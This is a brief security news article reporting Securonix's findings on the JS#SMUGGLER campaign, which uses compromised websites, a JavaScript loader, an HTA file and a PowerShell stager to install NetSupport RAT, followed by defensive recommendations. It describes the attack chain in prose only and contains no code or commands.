Experts Confirm JS#SMUGGLER Uses Compromised Sites to Deploy NetSupport RAT
Cybersecurity researchers have identified a new threat campaign named JS#SMUGGLER, which exploits compromised websites to distribute the NetSupport Remote Access Trojan (RAT). This campaign uses a sophisticated, multi-stage infection process combining obfuscated JavaScript loaders, HTA payloads, and encrypted PowerShell stagers to deploy the malware discreetly.
Securonix’s analysis highlights three key components: a hidden JavaScript loader injected into legitimate sites, an HTML Application (HTA) that runs encrypted PowerShell scripts via "mshta.exe," and the final PowerShell payload that downloads the NetSupport RAT. Researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee describe NetSupport RAT as a versatile malware giving attackers full control over victim machines, including remote desktop access, file manipulation, command execution, and data theft.
The initial attack vector involves silent redirects on hacked websites that deliver an obfuscated JavaScript file named "phone.js." This loader profiles the victim’s device and selectively serves malicious content customized for mobile or desktop environments. “This device-aware branching maximizes infection success by tailoring payload delivery while minimizing detection,” said the researchers.
Following the JavaScript execution, the chain downloads an HTA payload invisibly and executes it with "mshta.exe." This payload launches a PowerShell stager that decrypts and runs the main malicious script entirely in memory, reducing forensic traces. The PowerShell payload then retrieves and installs NetSupport RAT, granting full attacker control.
Securonix warns that the campaign shows strong signs of an actively maintained, professional cyber operation. Experts recommend applying strict Content Security Policy (CSP) rules, monitoring script activities, enabling PowerShell logging, restricting "mshta.exe" use, and deploying behavioral analysis to detect these sophisticated attacks.
The findings underscore the importance of securing websites and networks against multi-layered web-based malware campaigns. Using compromised websites as delivery platforms makes JS#SMUGGLER particularly challenging to block with traditional defenses, calling for improved cybersecurity hygiene and proactive threat monitoring.
Read more at: thehackernews.com